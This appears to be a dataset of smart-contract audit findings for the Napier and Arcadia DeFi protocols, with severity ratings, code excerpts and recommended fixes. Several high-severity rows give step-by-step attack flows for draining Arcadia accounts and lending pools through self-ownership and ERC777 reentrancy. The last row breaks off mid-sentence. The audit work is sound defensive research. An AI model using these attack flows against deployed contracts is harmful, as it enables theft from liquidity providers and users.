delete requestId;\\n bufferEth += _withdrawalQueueEth.toUint128();\\n\\n /// INTERACT ///\\n uint256 balanceBefore = address(this).balance;\\n REDEMPTION_QUEUE.burnRedemptionTicketNft(_requestId, payable(this));\\n if (address(this).balance < balanceBefore + _withdrawalQueueEth) revert InvariantViolation();\\n\\n IWETH9(Constants.WETH).deposit{value: _withdrawalQueueEth}();\\n }\\n```\\n" +Users are unable to collect their yield if tranche is paused,medium,"Users are unable to collect their yield if Tranche is paused, resulting in a loss of assets for the victims.\\nPer the contest's README page, it stated that the admin/owner is ""RESTRICTED"". Thus, any finding showing that the owner/admin can steal a user's funds, cause loss of funds or harm to the users, or cause the user's fund to be struck is valid in this audit contest.\\nQ: Is the admin/owner of the protocol/contracts TRUSTED or RESTRICTED?\\nRESTRICTED\\nThe admin of the protocol has the ability to pause the Tranche contract, and no one except for the admin can unpause it. 
If a malicious admin paused the Tranche contract, the users will not be able to collect their yield earned, leading to a loss of assets for them.\\n```\\nFile: Tranche.sol\\n /// @notice Pause issue, collect and updateUnclaimedYield\\n /// @dev only callable by management\\n function pause() external onlyManagement {\\n _pause();\\n }\\n\\n /// @notice Unpause issue, collect and updateUnclaimedYield\\n /// @dev only callable by management\\n function unpause() external onlyManagement {\\n _unpause();\\n }\\n```\\n\\nThe following shows that the `collect` function can only be executed when the system is not paused.\\n```\\nFile: Tranche.sol\\n function collect() public nonReentrant whenNotPaused returns (uint256) {\\n uint256 _lscale = lscales[msg.sender];\\n uint256 accruedInTarget = unclaimedYields[msg.sender];\\n```\\n",Consider allowing the users to collect yield even when the system is paused.,"Users are unable to collect their yield if Tranche is paused, resulting in a loss of assets for the victims.","```\\nFile: Tranche.sol\\n /// @notice Pause issue, collect and updateUnclaimedYield\\n /// @dev only callable by management\\n function pause() external onlyManagement {\\n _pause();\\n }\\n\\n /// @notice Unpause issue, collect and updateUnclaimedYield\\n /// @dev only callable by management\\n function unpause() external onlyManagement {\\n _unpause();\\n }\\n```\\n" +`swapUnderlyingForYt` revert due to rounding issues,medium,"The core function (swapUnderlyingForYt) of the Router will revert due to rounding issues. 
Users who intend to swap underlying assets to YT tokens via the Router will be unable to do so.\\nThe `swapUnderlyingForYt` allows users to swap underlying assets to a specific number of YT tokens they desire.\\n```\\nFile: NapierRouter.sol\\n function swapUnderlyingForYt(\\n address pool,\\n uint256 index,\\n uint256 ytOutDesired,\\n uint256 underlyingInMax,\\n address recipient,\\n uint256 deadline\\n ) external payable override nonReentrant checkDeadline(deadline) returns (uint256) {\\n..SNIP..\\n // Variable Definitions:\\n // - `uDeposit`: The amount of underlying asset that needs to be deposited to issue PT and YT.\\n // - `ytOutDesired`: The desired amount of PT and YT to be issued.\\n // - `cscale`: Current scale of the Tranche.\\n // - `maxscale`: Maximum scale of the Tranche (denoted as 'S' in the formula).\\n // - `issuanceFee`: Issuance fee in basis points. (10000 =100%).\\n\\n // Formula for `Tranche.issue`:\\n // ```\\n // shares = uDeposit / s\\n // fee = shares * issuanceFeeBps / 10000\\n // pyIssue = (shares - fee) * S\\n // ```\\n\\n // Solving for `uDeposit`:\\n // ```\\n // uDeposit = (pyIssue * s / S) / (1 - issuanceFeeBps / 10000)\\n // ```\\n // Hack:\\n // Buffer is added to the denominator.\\n // This ensures that at least `ytOutDesired` amount of PT and YT are issued.\\n // If maximum scale and current scale are significantly different or `ytOutDesired` is small, the function might fail.\\n // Without this buffer, any rounding errors that reduce the issued PT and YT could lead to an insufficient amount of PT to be repaid to the pool.\\n uint256 uDepositNoFee = cscale * ytOutDesired / maxscale;\\n uDeposit = uDepositNoFee * MAX_BPS / (MAX_BPS - (series.issuanceFee + 1)); // 0.01 bps buffer\\n```\\n\\nLine 353-354 above compute the number of underlying deposits needed to send to the Tranche to issue the amount of YT token the users desired. 
It attempts to add a buffer of 0.01 bps buffer to prevent rounding errors that could lead to insufficient PT being repaid to the pool and result in a revert. During the audit, it was found that this buffer is ineffective in achieving its purpose.\\nThe following example/POC demonstrates a revert could still occur due to insufficient PT being repaid despite having a buffer:\\nLet the state be the following:\\ncscale = 1.2e18\\nmaxScale = 1.25e18\\nytOutDesired = 123\\nissuanceFee = 0% (For simplicity's sake, the fee is set to zero. Having fee or not does not affect the validity of this issue as this is a math problem)\\nThe following computes the number of underlying assets to be transferred to the Tranche to mint/issue PY + YT\\n```\\nuDepositNoFee = cscale * ytOutDesired / maxscale;\\nuDepositNoFee = 1.2e18 * 123 / 1.25e18 = 118.08 = 118 (Round down)\\n\\nuDeposit = uDepositNoFee * MAX_BPS / (MAX_BPS - (series.issuanceFee + 1))\\nuDeposit = 118 * 10000 / (10000 - (0 + 1)) = 118.0118012 = 118 (Round down)\\n```\\n\\nSubsequently, the code will perform a flash-swap via the `swapPtForUnderlying` function. It will borrow 123 PT from the pool, which must be repaid later.\\nIn the swap callback function, the code will transfer 118 underlying assets to the Tranche and execute the `Tranche.issue` function to mint/issue PY + YT.\\nWithin the `Tranche.issue` function, it will trigger the `adapter.prefundedDeposit()` function to mint the estETH/shares. 
The following is the number of estETH/shares minted:\\n```\\nshares = assets * (total supply/total assets)\\nshares = 118 * 100e18 / 120e18 = 98.33333333 = 98 shares\\n```\\n\\nNext, Line 219 below of the `Tranche.issue` function will compute the number of PY+YT to be issued/minted\\n```\\nissued = (sharesUsed - fee).mulWadDown(_maxscale);\\nissued = (sharesUsed - 0).mulWadDown(_maxscale);\\nissued = sharesUsed.mulWadDown(_maxscale);\\n\\nissued = sharesUsed * _maxscale / WAD\\nissued = 98 * 1.25e18 / 1e18 = 122.5 = 122 PT (Round down)\\n```\\n\\n```\\nFile: Tranche.sol\\n function issue(\\n address to,\\n uint256 underlyingAmount\\n ) external nonReentrant whenNotPaused notExpired returns (uint256 issued) {\\n..SNIP..\\n uint256 sharesUsed = sharesMinted + accruedInTarget;\\n uint256 fee = sharesUsed.mulDivUp(issuanceFeeBps, MAX_BPS);\\n issued = (sharesUsed - fee).mulWadDown(_maxscale);\\n```\\n\\nAt the end of the `Tranche.issue` function, 122 PY + YT is issued/minted back to the Router.\\nNote that 123 PT was flash-loaned earlier, and 123 PT needs to be repaid. Otherwise, the code at Line 164 below will revert. The main problem is that only 122 PY was issued/minted (a shortfall of 1 PY). Thus, the swap TX will revert at the end.\\n```\\nFile: NapierRouter.sol\\n function swapCallback(int256 underlyingDelta, int256 ptDelta, bytes calldata data) external override {\\n..SNIP..\\n uint256 pyIssued = params.pt.issue({to: address(this), underlyingAmount: params.underlyingDeposit});\\n\\n // Repay the PT to Napier pool\\n if (pyIssued < pyDesired) revert Errors.RouterInsufficientPtRepay();\\n```\\n","The buffer does not appear to be the correct approach to manage this rounding error. One could increase the buffer from 0.01% to 1% and solve the issue in the above example, but a different or larger number might cause a rounding error to surface again.
Also, a larger buffer means that many unnecessary PTs will be issued.\\nThus, it is recommended that a round-up division be performed when computing the `uDepositNoFee` and `uDeposit` using functions such as `divWadUp` so that the issued/minted PT can cover the debt.",The core function (swapUnderlyingForYt) of the Router will break. Users who intend to swap underlying assets to YT tokens via the Router will not be able to do so.,"```\\nFile: NapierRouter.sol\\n function swapUnderlyingForYt(\\n address pool,\\n uint256 index,\\n uint256 ytOutDesired,\\n uint256 underlyingInMax,\\n address recipient,\\n uint256 deadline\\n ) external payable override nonReentrant checkDeadline(deadline) returns (uint256) {\\n..SNIP..\\n // Variable Definitions:\\n // - `uDeposit`: The amount of underlying asset that needs to be deposited to issue PT and YT.\\n // - `ytOutDesired`: The desired amount of PT and YT to be issued.\\n // - `cscale`: Current scale of the Tranche.\\n // - `maxscale`: Maximum scale of the Tranche (denoted as 'S' in the formula).\\n // - `issuanceFee`: Issuance fee in basis points. 
(10000 =100%).\\n\\n // Formula for `Tranche.issue`:\\n // ```\\n // shares = uDeposit / s\\n // fee = shares * issuanceFeeBps / 10000\\n // pyIssue = (shares - fee) * S\\n // ```\\n\\n // Solving for `uDeposit`:\\n // ```\\n // uDeposit = (pyIssue * s / S) / (1 - issuanceFeeBps / 10000)\\n // ```\\n // Hack:\\n // Buffer is added to the denominator.\\n // This ensures that at least `ytOutDesired` amount of PT and YT are issued.\\n // If maximum scale and current scale are significantly different or `ytOutDesired` is small, the function might fail.\\n // Without this buffer, any rounding errors that reduce the issued PT and YT could lead to an insufficient amount of PT to be repaid to the pool.\\n uint256 uDepositNoFee = cscale * ytOutDesired / maxscale;\\n uDeposit = uDepositNoFee * MAX_BPS / (MAX_BPS - (series.issuanceFee + 1)); // 0.01 bps buffer\\n```\\n" +FRAX admin can adjust fee rate to harm Napier and its users,medium,"FRAX admin can adjust fee rates to harm Napier and its users, preventing Napier users from withdrawing.\\nPer the contest page, the admins of the protocols that Napier integrates with are considered ""RESTRICTED"". This means that any issue related to FRAX's admin action that could negatively affect Napier protocol/users will be considered valid in this audit contest.\\nQ: Are the admins of the protocols your contracts integrate with (if any) TRUSTED or RESTRICTED? 
RESTRICTED\\nFollowing is one of the ways that FRAX admin can harm Napier and its users.\\nFRAX admin can set the fee to 100%.\\n```\\nFile: FraxEtherRedemptionQueue.sol\\n /// @notice Sets the fee for redeeming\\n /// @param _newFee New redemption fee given in percentage terms, using 1e6 precision\\n function setRedemptionFee(uint64 _newFee) external {\\n _requireSenderIsTimelock();\\n if (_newFee > FEE_PRECISION) revert ExceedsMaxRedemptionFee(_newFee, FEE_PRECISION);\\n\\n emit SetRedemptionFee({ oldRedemptionFee: redemptionQueueState.redemptionFee, newRedemptionFee: _newFee });\\n\\n redemptionQueueState.redemptionFee = _newFee;\\n }\\n```\\n\\nWhen the adaptor attempts to redeem the staked ETH from FRAX via the `enterRedemptionQueue` function, the 100% fee will consume the entire amount of the staked fee, leaving nothing for Napier's adaptor.\\n```\\nFile: FraxEtherRedemptionQueue.sol\\n function enterRedemptionQueue(address _recipient, uint120 _amountToRedeem) public nonReentrant {\\n // Get queue information\\n RedemptionQueueState memory _redemptionQueueState = redemptionQueueState;\\n RedemptionQueueAccounting memory _redemptionQueueAccounting = redemptionQueueAccounting;\\n\\n // Calculations: redemption fee\\n uint120 _redemptionFeeAmount = ((uint256(_amountToRedeem) * _redemptionQueueState.redemptionFee) /\\n FEE_PRECISION).toUint120();\\n\\n // Calculations: amount of ETH owed to the user\\n uint120 _amountEtherOwedToUser = _amountToRedeem - _redemptionFeeAmount;\\n\\n // Calculations: increment ether liabilities by the amount of ether owed to the user\\n _redemptionQueueAccounting.etherLiabilities += uint128(_amountEtherOwedToUser);\\n\\n // Calculations: increment unclaimed fees by the redemption fee taken\\n _redemptionQueueAccounting.unclaimedFees += _redemptionFeeAmount;\\n\\n // Calculations: maturity timestamp\\n uint64 _maturityTimestamp = uint64(block.timestamp) + _redemptionQueueState.queueLengthSecs;\\n\\n // Effects: Initialize the 
redemption ticket NFT information\\n nftInformation[_redemptionQueueState.nextNftId] = RedemptionQueueItem({\\n amount: _amountEtherOwedToUser,\\n maturity: _maturityTimestamp,\\n hasBeenRedeemed: false,\\n earlyExitFee: _redemptionQueueState.earlyExitFee\\n });\\n```\\n",Ensure that the protocol team and its users are aware of the risks of such an event and develop a contingency plan to manage it.,Users unable to withdraw their assets. Loss of assets for the victim.,"```\\nFile: FraxEtherRedemptionQueue.sol\\n /// @notice Sets the fee for redeeming\\n /// @param _newFee New redemption fee given in percentage terms, using 1e6 precision\\n function setRedemptionFee(uint64 _newFee) external {\\n _requireSenderIsTimelock();\\n if (_newFee > FEE_PRECISION) revert ExceedsMaxRedemptionFee(_newFee, FEE_PRECISION);\\n\\n emit SetRedemptionFee({ oldRedemptionFee: redemptionQueueState.redemptionFee, newRedemptionFee: _newFee });\\n\\n redemptionQueueState.redemptionFee = _newFee;\\n }\\n```\\n" +SFrxETHAdapter redemptionQueue waiting period can DOS adapter functions,medium,"The waiting period between `rebalancer` address making a withdrawal request and the withdrawn funds being ready to claim from `FraxEtherRedemptionQueue` is extremely long which can lead to a significant period of time where some of the protocol's functions are either unusable or work in a diminished capacity.\\nIn FraxEtherRedemptionQueue.sol; the Queue wait time is stored in the state struct `redemptionQueueState` as `redemptionQueueState.queueLengthSecs` and is curently set to `1_296_000 Seconds` or 15 Days; as recently as January however it was at `1_555_200 Seconds` or `18 Days`. View current setting by calling `redemptionQueueState()` here.\\n`BaseLSTAdapter::requestWithdrawal()` is an essential function which helps to maintain `bufferEth` at a defined, healthy level. 
`bufferEth` is a facility which allows the smooth running of redemptions and deposits.\\nFor redemptions; it allows users to redeem `underlying` without having to wait for any period of time. However, redemption amounts requested which are less than `bufferEth` will be rejected as can be seen below in `BaseLSTAdapter::prefundedRedeem()`. Further, there is nothing preventing `redemptions` from bringing `bufferEth` all the way to `0`.\\n```\\n function prefundedRedeem(address recipient) external virtual returns (uint256, uint256) {\\n // SOME CODE\\n\\n // If the buffer is insufficient, shares cannot be redeemed immediately\\n // Need to wait for the withdrawal to be completed and the buffer to be refilled.\\n> if (assets > bufferEthCache) revert InsufficientBuffer();\\n\\n // SOME CODE\\n }\\n```\\n\\nFor deposits; where `bufferEth` is too low, it keeps user `deposits` in the contract until a deposit is made which brings `bufferEth` above its target, at which point it stakes. During this time, the `deposits`, which are kept in the adapter, do not earn any yield; making those funds unprofitable.\\n```\\n function prefundedDeposit() external nonReentrant returns (uint256, uint256) {\\n // SOME CODE\\n> if (targetBufferEth >= availableEth + queueEthCache) {\\n> bufferEth = availableEth.toUint128();\\n return (assets, shares);\\n }\\n // SOME CODE\\n }\\n```\\n",Consider adding a function allowing the rebalancer to call `earlyBurnRedemptionTicketNft()` in `FraxEtherRedemptionQueue.sol` when there is a necessity. This will allow an immediate withdrawal for a fee of 0.5%; see function here,"If the `SFrxETHAdapter` experiences a large net redemption, bringing `bufferEth` significantly below `targetBufferEth`, the rebalancer can be required to make a withdrawal request in order to replenish the buffer. However, this will be an ineffective action given the current, 15 Day waiting period.
During the waiting period if `redemptions > deposits`, the `bufferEth` can be brought down to `0` which will mean a complete DOSing of the `prefundedRedeem()` function.\\nDuring the wait period too; if `redemptions >= deposits`, no new funds will be staked in `FRAX` so yields for users will decrease and may in turn lead to more redemptions.\\nThese conditions could also necessitate the immediate calling again of `requestWithdrawal()`, given that withdrawal requests can only bring `bufferEth` up to it's target level and not beyond and during the wait period there could be further redemptions.","```\\n function prefundedRedeem(address recipient) external virtual returns (uint256, uint256) {\\n // SOME CODE\\n\\n // If the buffer is insufficient, shares cannot be redeemed immediately\\n // Need to wait for the withdrawal to be completed and the buffer to be refilled.\\n> if (assets > bufferEthCache) revert InsufficientBuffer();\\n\\n // SOME CODE\\n }\\n```\\n" +`AccountV1#flashActionByCreditor` can be used to drain assets from account without withdrawing,high,"`AccountV1#flashActionByCreditor` is designed to allow atomic flash actions moving funds from the `owner` of the account. By making the account own itself, these arbitrary calls can be used to transfer `ERC721` assets directly out of the account. 
The assets being transferred from the account will still show as deposited on the account allowing it to take out loans from creditors without having any actual assets.\\nThe overview of the exploit are as follows:\\n```\\n1) Deposit ERC721\\n2) Set creditor to malicious designed creditor\\n3) Transfer the account to itself\\n4) flashActionByCreditor to transfer ERC721\\n 4a) account owns itself so _transferFromOwner allows transfers from account\\n 4b) Account is now empty but still thinks is has ERC721\\n5) Use malicious designed liquidator contract to call auctionBoughtIn\\n and transfer account back to attacker\\n7) Update creditor to legitimate creditor\\n8) Take out loan against nothing\\n9) Profit\\n```\\n\\nThe key to this exploit is that the account is able to be it's own `owner`. Paired with a maliciously designed `creditor` (creditor can be set to anything) `flashActionByCreditor` can be called by the attacker when this is the case.\\nAccountV1.sol#L770-L772\\n```\\nif (transferFromOwnerData.assets.length > 0) {\\n _transferFromOwner(transferFromOwnerData, actionTarget);\\n}\\n```\\n\\nIn these lines the `ERC721` token is transferred out of the account. The issue is that even though the token is transferred out, the `erc721Stored` array is not updated to reflect this change.\\nAccountV1.sol#L570-L572\\n```\\nfunction auctionBoughtIn(address recipient) external onlyLiquidator nonReentrant {\\n _transferOwnership(recipient);\\n}\\n```\\n\\nAs seen above `auctionBoughtIn` does not have any requirement besides being called by the `liquidator`. Since the `liquidator` is also malicious. It can then abuse this function to set the `owner` to any address, which allows the attacker to recover ownership of the account. 
Now the attacker has an account that still considers the `ERC721` token as owned but that token isn't actually present in the account.\\nNow the account creditor can be set to a legitimate pool and a loan taken out against no collateral at all.","The root cause of this issue is that the account can own itself. The fix is simple, make the account unable to own itself by causing transferOwnership to revert if `owner == address(this)`","Account can take out completely uncollateralized loans, causing massive losses to all lending pools.",```\\n1) Deposit ERC721\\n2) Set creditor to malicious designed creditor\\n3) Transfer the account to itself\\n4) flashActionByCreditor to transfer ERC721\\n 4a) account owns itself so _transferFromOwner allows transfers from account\\n 4b) Account is now empty but still thinks is has ERC721\\n5) Use malicious designed liquidator contract to call auctionBoughtIn\\n and transfer account back to attacker\\n7) Update creditor to legitimate creditor\\n8) Take out loan against nothing\\n9) Profit\\n```\\n +Reentrancy in flashAction() allows draining liquidity pools,high,"It is possible to drain a liquidity pool/creditor if the pool's asset is an ERC777 token by triggering a reentrancy flow using flash actions.\\nThe following vulnerability describes a complex flow that allows draining any liquidity pool where the underlying asset is an ERC777 token. Before diving into the vulnerability, it is important to properly understand and highlight some concepts from Arcadia that are relevant in order to allow this vulnerability to take place:\\nFlash actions: flash actions in Arcadia operate in a similar fashion to flash loans. Any account owner will be able to borrow an arbitrary amount from the creditor without putting any collateral as long as the account remains in a healthy state at the end of execution. 
The following steps summarize what actually happens when `LendingPool.flashAction()` flow is triggered:\\nThe amount borrowed (plus fees) will be minted to the account as debt tokens. This means that the amount borrowed in the flash action will be accounted as debt during the whole `flashAction()` execution. If a flash action borrowing 30 tokens is triggered for an account that already has 10 tokens in debt, the debt balance of the account will increase to 40 tokens + fees.\\nBorrowed asset will be transferred to the `actionTarget`. The `actionTarget` is an arbitrary address passed as parameter in the `flashAction()`. It is important to be aware of the fact that transferring the borrowed funds is performed prior to calling `flashActionByCreditor()`, which is the function that will end up verifying the account's health state. This is the step where the reentrancy will be triggered by the `actionTarget`.\\nThe account's `flashActionByCreditor()` function is called. This is the last step in the execution function, where a health check for the account is performed (among other things).\\n// LendingPool.sol\\n\\nfunction flashAction(\\n uint256 amountBorrowed,\\n address account,\\n address `actionTarget`, \\n bytes calldata actionData,\\n bytes3 referrer\\n ) external whenBorrowNotPaused processInterests {\\n ... 
\\n\\n uint256 amountBorrowedWithFee = amountBorrowed + amountBorrowed.mulDivUp(originationFee, ONE_4);\\n\\n ...\\n \\n // Mint debt tokens to the Account, debt must be minted before the actions in the Account are performed.\\n _deposit(amountBorrowedWithFee, account);\\n\\n ...\\n\\n // Send Borrowed funds to the `actionTarget`.\\n asset.safeTransfer(actionTarget, amountBorrowed);\\n \\n // The Action Target will use the borrowed funds (optionally with additional assets withdrawn from the Account)\\n // to execute one or more actions (swap, deposit, mint...).\\n // Next the action Target will deposit any of the remaining funds or any of the recipient token\\n // resulting from the actions back into the Account.\\n // As last step, after all assets are deposited back into the Account a final health check is done:\\n // The Collateral Value of all assets in the Account is bigger than the total liabilities against the Account (including the debt taken during this function).\\n // flashActionByCreditor also checks that the Account indeed has opened a margin account for this Lending Pool.\\n {\\n uint256 accountVersion = IAccount(account).flashActionByCreditor(actionTarget, actionData);\\n if (!isValidVersion[accountVersion]) revert LendingPoolErrors.InvalidVersion();\\n }\\n \\n ... \\n }\\nCollateral value: Each creditor is configured with some risk parameters in the `Registry` contract. One of the risk parameters is the `minUsdValue`, which is the minimum USD value any asset must have when it is deposited into an account for the creditor to consider such collateral as valid. If the asset does not reach the `minUsdValue`, it will simply be accounted with a value of 0. For example: if the `minUsdValue` configured for a given creditor is 100 USD and we deposit an asset in our account worth 99 USD (let's say 99 USDT), the USDT collateral will be accounted as 0. This means that our USDT will be worth nothing at the eyes of the creditor. 
However, if we deposit one more USDT token into the account, our USD collateral value will increase to 100 USD, reaching the `minUsdValue`. Now, the creditor will consider our account's collateral to be worth 100 USD instead of 0 USD.\\nLiquidations: Arcadia liquidates unhealthy accounts using a dutch-auction model. When a liquidation is triggered via `Liquidator.liquidateAccount()` all the information regarding the debt and assets from the account will be stored in `auctionInformation_` , which maps account addresses to an `AuctionInformation` struct. An important field in this struct is the `assetShares`, which will store the relative value of each asset, with respect to the total value of the Account.\\nWhen a user wants to bid for an account in liquidation, the `Liquidator.bid()` function must be called. An important feature from this function is that it does not require the bidder to repay the loan in full (thus getting the full collateral in the account). Instead, the bidder can specify which collateral asset and amount wants to obtain back, and the contract will compute the amount of debt required to be repaid from the bidder for that amount of collateral. If the user wants to repay the full loan, all the collateral in the account will be specified by the bidder.\\nWith this background, we can now move on to describing the vulnerability in full.\\nInitially, we will create an account and deposit collateral whose value is in the limit of the configured `minUsdValue` (if the `minUsdValue` is 100 tokens, the ideal amount to have will be 100 tokens to maximize gains). We will see why this is required later. The account's collateral and debt status will look like this:\\n\\nThe next step after creating the account is to trigger a flash action. As mentioned in the introduction, the borrowed funds will be sent to the `actionTarget` (this will be a contract we create and control). 
An important requirement is that if the borrowed asset is an ERC777 token, we will be able to execute the ERC777 callback in our `actionTarget` contract, enabling us to gain control of the execution flow. Following our example, if we borrowed 200 tokens the account's status would look like this:\\n\\nOn receiving the borrowed tokens, the actual attack will begin. The `actionTarget` will trigger the `Liquidator.liquidateAccount()` function to liquidate our own account. This is possible because the funds borrowed using the flash action are accounted as debt for our account (as we can see in the previous image, the borrowed amount greatly surpasses our account's collateral value) prior to executing the `actionTarget` ERC777 callback, making the account susceptible to being liquidated. Executing this function will start the auction process and store data relevant to the account and its debt in the `auctionInformation_` mapping.\\nAfter finishing the `liquidateAccount()` execution, the next step for the `actionTarget` is to place a bid for our own account auction calling `Liquidator.bid()`. The trick here is to request a small amount from the account's collateral in the `askedAssetAmounts` array (if we had 100 tokens as collateral in the account, we could ask for only 1). The small requested amount will make the computed `price` to pay for the bid by `_calculateBidPrice()` be really small so that we can maximize our gains.
Another requirement will be to set the `endAuction_` parameter to `true` (we will see why later):\\n```\\n// Liquidator.sol\\n\\nfunction bid(address account, uint256[] memory askedAssetAmounts, bool endAuction_) external nonReentrant {\\n AuctionInformation storage auctionInformation_ = auctionInformation[account];\\n if (!auctionInformation_.inAuction) revert LiquidatorErrors.NotForSale();\\n\\n // Calculate the current auction price of the assets being bought.\\n uint256 totalShare = _calculateTotalShare(auctionInformation_, askedAssetAmounts);\\n uint256 price = _calculateBidPrice(auctionInformation_, totalShare);\\n \\n // Transfer an amount of ""price"" in ""Numeraire"" to the LendingPool to repay the Accounts debt.\\n // The LendingPool will call a ""transferFrom"" from the bidder to the pool -> the bidder must approve the LendingPool.\\n // If the amount transferred would exceed the debt, the surplus is paid out to the Account Owner and earlyTerminate is True.\\n uint128 startDebt = auctionInformation_.startDebt;\\n bool earlyTerminate = ILendingPool(auctionInformation_.creditor).auctionRepay(\\n startDebt, auctionInformation_.minimumMargin, price, account, msg.sender\\n );\\n // rest of code\\n}\\n```\\n\\nAfter computing the small price to pay for the bid, theLendingPool.auctionRepay() will be called. Because we are repaying a really small amount from the debt, the `accountDebt <= amount` condition will NOT hold, so the only actions performed by `LendingPool.auctionRepay()` will be transferring the small amount of tokens to pay the bid, and `_withdraw()` (burn) the corresponding debt from the account (a small amount of debt will be burnt here because the bid amount is small). 
It is also important to note that the `earlyTerminate` flag will remain as false:\\n```\\n// LendingPool.sol\\n\\nfunction auctionRepay(uint256 startDebt, uint256 minimumMargin_, uint256 amount, address account, address bidder)\\n external\\n whenLiquidationNotPaused\\n onlyLiquidator \\n processInterests\\n returns (bool earlyTerminate)\\n {\\n // Need to transfer before burning debt or ERC777s could reenter.\\n // Address(this) is trusted -> no risk on re-entrancy attack after transfer.\\n asset.safeTransferFrom(bidder, address(this), amount);\\n\\n uint256 accountDebt = maxWithdraw(account); \\n if (accountDebt == 0) revert LendingPoolErrors.IsNotAnAccountWithDebt();\\n if (accountDebt <= amount) {\\n // The amount recovered by selling assets during the auction is bigger than the total debt of the Account.\\n // -> Terminate the auction and make the surplus available to the Account-Owner.\\n earlyTerminate = true;\\n unchecked {\\n _settleLiquidationHappyFlow(account, startDebt, minimumMargin_, bidder, (amount - accountDebt));\\n }\\n amount = accountDebt;\\n }\\n \\n _withdraw(amount, address(this), account); \\n\\n emit Repay(account, bidder, amount);\\n }\\n```\\n\\nAfter `LendingPool.auctionRepay()` , execution will go back to `Liquidator.bid()`. The account's `auctionBid()` function will then be called, which will transfer the 1 token requested by the bidder in the `askedAssetAmounts` parameter from the account's collateral to the bidder. This is the most important concept in the attack. 
Because 1 token is moving out from the account's collateral, the current collateral value from the account will be decreased from 100 USD to 99 USD, making the collateral value be under the minimum `minUsdValue` amount of 100 USD, and thus making the collateral value from the account go straight to 0 at the eyes of the creditor:\\n\\nBecause the `earlyTerminate` was NOT set to `true` in `LendingPool.auctionRepay()`, the `if (earlyTerminate)` condition will be skipped, going straight to evaluate the `else if (endAuction_)` condition . Because we set theendAuction_ parameter to `true` when calling the `bid()` function, `_settleAuction()` will execute.\\n```\\n// Liquidator.sol\\n\\nfunction bid(address account, uint256[] memory askedAssetAmounts, bool endAuction_) external nonReentrant {\\n // rest of code\\n \\n // Transfer the assets to the bidder.\\n IAccount(account).auctionBid(\\n auctionInformation_.assetAddresses, auctionInformation_.assetIds, askedAssetAmounts, msg.sender\\n );\\n // If all the debt is repaid, the auction must be ended, even if the bidder did not set endAuction to true.\\n if (earlyTerminate) {\\n // Stop the auction, no need to do a health check for the account since it has no debt anymore.\\n _endAuction(account);\\n }\\n // If not all debt is repaid, the bidder can still earn a termination incentive by ending the auction\\n // if one of the conditions to end the auction is met.\\n // ""_endAuction()"" will silently fail without reverting, if the auction was not successfully ended.\\n else if (endAuction_) {\\n if (_settleAuction(account, auctionInformation_)) _endAuction(account);\\n } \\n }\\n```\\n\\n`_settleAuction()` is where the final steps of the attack will take place. 
Because we made the collateral value of our account purposely decrease from the `minUsdValue`, `_settleAuction` will interpret that all collateral has been sold, and the `else if (collateralValue == 0)` will evaluate to true, making the creditor's `settleLiquidationUnhappyFlow()` function be called:\\n```\\nfunction _settleAuction(address account, AuctionInformation storage auctionInformation_)\\n internal\\n returns (bool success)\\n {\\n // Cache variables.\\n uint256 startDebt = auctionInformation_.startDebt;\\n address creditor = auctionInformation_.creditor;\\n uint96 minimumMargin = auctionInformation_.minimumMargin;\\n\\n uint256 collateralValue = IAccount(account).getCollateralValue();\\n uint256 usedMargin = IAccount(account).getUsedMargin();\\n \\n // Check the different conditions to end the auction.\\n if (collateralValue >= usedMargin || usedMargin == minimumMargin) { \\n // Happy flow: Account is back in a healthy state.\\n // An Account is healthy if the collateral value is equal or greater than the used margin.\\n // If usedMargin is equal to minimumMargin, the open liabilities are 0 and the Account is always healthy.\\n ILendingPool(creditor).settleLiquidationHappyFlow(account, startDebt, minimumMargin, msg.sender);\\n } else if (collateralValue == 0) {\\n // Unhappy flow: All collateral is sold.\\n ILendingPool(creditor).settleLiquidationUnhappyFlow(account, startDebt, minimumMargin, msg.sender);\\n }\\n // rest of code\\n \\n \\n return true;\\n }\\n```\\n\\nExecuting the `settleLiquidationUnhappyFlow()` will burn ALL the remaining debt (balanceOf[account] will return all the remaining balance of debt tokens for the account), and the liquidation will be finished, calling `_endLiquidation()` and leaving the account with 99 tokens of collateral and a 0 amount of debt (and the `actionTarget` with ALL the borrowed funds taken from the flash action).\\n```\\n// LendingPool.sol\\n\\nfunction settleLiquidationUnhappyFlow(\\n address account,\\n uint256 
startDebt,\\n uint256 minimumMargin_,\\n address terminator\\n ) external whenLiquidationNotPaused onlyLiquidator processInterests {\\n // rest of code\\n\\n // Any remaining debt that was not recovered during the auction must be written off.\\n // Depending on the size of the remaining debt, different stakeholders will be impacted.\\n uint256 debtShares = balanceOf[account];\\n uint256 openDebt = convertToAssets(debtShares);\\n uint256 badDebt;\\n // rest of code\\n\\n // Remove the remaining debt from the Account now that it is written off from the liquidation incentives/Liquidity Providers.\\n _burn(account, debtShares);\\n realisedDebt -= openDebt;\\n emit Withdraw(msg.sender, account, account, openDebt, debtShares);\\n\\n _endLiquidation();\\n\\n emit AuctionFinished(\\n account, address(this), startDebt, initiationReward, terminationReward, liquidationPenalty, badDebt, 0\\n );\\n }\\n```\\n\\nAfter the actionTarget's ERC777 callback execution, the execution flow will return to the initially called `flashAction()` function, and the final `IAccount(account).flashActionByCreditor()` function will be called, which will pass all the health checks due to the fact that all the debt from the account was burnt:\\n```\\n// LendingPool.sol\\n\\nfunction flashAction(\\n uint256 amountBorrowed,\\n address account,\\n address actionTarget, \\n bytes calldata actionData,\\n bytes3 referrer\\n ) external whenBorrowNotPaused processInterests {\\n \\n // rest of code \\n \\n // The Action Target will use the borrowed funds (optionally with additional assets withdrawn from the Account)\\n // to execute one or more actions (swap, deposit, mint// rest of code).\\n // Next the action Target will deposit any of the remaining funds or any of the recipient token\\n // resulting from the actions back into the Account.\\n // As last step, after all assets are deposited back into the Account a final health check is done:\\n // The Collateral Value of all assets in the Account is bigger 
